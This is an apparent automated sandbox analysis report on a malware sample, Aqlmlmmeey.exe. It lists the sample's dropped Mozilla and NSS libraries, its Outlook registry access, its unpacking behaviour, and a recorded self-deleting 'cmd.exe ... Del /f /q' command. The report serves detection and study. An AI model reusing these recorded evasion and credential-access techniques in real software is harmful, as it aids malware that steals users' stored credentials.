Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_01
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: Aqlmlmmeey.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Aqlmlmmeey.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Aqlmlmmeey.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Aqlmlmmeey.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Aqlmlmmeey.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Aqlmlmmeey.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Aqlmlmmeey.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Aqlmlmmeey.exe, 00000000.00000003.269713467.00000000054BC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Aqlmlmmeey.exe, 00000000.00000002.273689081.000000006F429000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: v{ UC:\garehiyotino_100\cayucis_dezoxo.pdb source: Aqlmlmmeey.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Aqlmlmmeey.exe, 00000000.00000002.273689081.000000006F429000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: C:\garehiyotino_100\cayucis_dezoxo.pdb source: Aqlmlmmeey.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: Aqlmlmmeey.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Aqlmlmmeey.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Aqlmlmmeey.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Aqlmlmmeey.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Aqlmlmmeey.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Unpacked PE file: 0.2.Aqlmlmmeey.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Unpacked PE file: 0.2.Aqlmlmmeey.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_004000BB push edx; retf

0_2_004000C2

Source: sqlite3.dll.0.dr	Static PE information: section name: /4
Source: sqlite3.dll.0.dr	Static PE information: section name: /19
Source: sqlite3.dll.0.dr	Static PE information: section name: /31
Source: sqlite3.dll.0.dr	Static PE information: section name: /45
Source: sqlite3.dll.0.dr	Static PE information: section name: /57
Source: sqlite3.dll.0.dr	Static PE information: section name: /70
Source: sqlite3.dll.0.dr	Static PE information: section name: /81
Source: sqlite3.dll.0.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc
Source: mozglue.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

0_2_0042A2F9

Source: ucrtbase.dll.0.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\Aqlmlmmeey.exe'
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\Aqlmlmmeey.exe'			Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004206DD

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe TID: 488	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4668	Thread sleep count: 89 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
